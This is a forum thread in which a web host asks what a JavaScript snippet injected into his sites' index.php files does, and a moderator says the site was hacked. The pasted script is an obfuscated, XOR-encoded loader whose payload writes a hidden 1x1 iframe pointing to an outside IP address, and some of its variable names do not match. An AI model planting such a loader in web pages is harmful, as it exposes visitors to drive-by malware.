LINUX SUSE index files being injected with javacript code..

Discussion in 'Server Operation' started by pkfrizzlefry, Jul 20, 2008.

  1. pkfrizzlefry

    pkfrizzlefry New Member

    Apperently alot of the index.php files on multiple sites i host on a SUSE box hosted on oneandone dedicated server are being injected with javascript code i posted below...

    It opens up a frontpage office install on winxp when you go to the sites...

    Anyone know what the code below is doing and what the threat level is?

    I cleaned it up on some sites but left it on one for now as i dont know what it does

    Anyone know?


    Greatly apreciate your time

    ----code being injected
    <script language='javascript'>function cirpfjyua(lsolytfeqrzhg, nzndhq){var jyaghrpagphcgiuwrxh = "";for (var i = 0 ; i < lsolytfeqrzhg.length; ++i) xyloqymhhfkqdhgu += String.fromCharCode(nzncirpfjyuacirpfjyuacirpfjyuadhq ^(nzndhq ^ lsolytfeqrzhg.charCodeAt(i)));return xyloqymhhfkqdhgu;}var lsolytfeqrzhg = "\x20\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65\x3d\x22\x76\x69\x73\x69\x62\x69\x6c\x69\x74\x79\x3a\x68\x69\x64\x64\x65\x6e\x22\x3e\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x38\x35\x2e\x31\x37\x2e\x31\x34\x33\x2e\x31\x35\x32\x2f\x22\x20\x77\x69\x64\x74\x68\x3d\x31\x20\x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x3c\x2f\x64\x69\x76\x3e\x27\x29\x3b\x0d\x0a\x0d\x0a"; var xyloqymhhfkqdhgu = cirpfjyua(lsolytfeqrzhg, 121); eval(xyloqymhhfkqdhgu); </script>
  2. falko

    falko Super Moderator ISPConfig Developer

    I don't know what the code is doing, but from what you write it sounds if the site got hacked, so I'd remove that code as fast as possible and find out (-> logs) how they managed to inject it.

Share This Page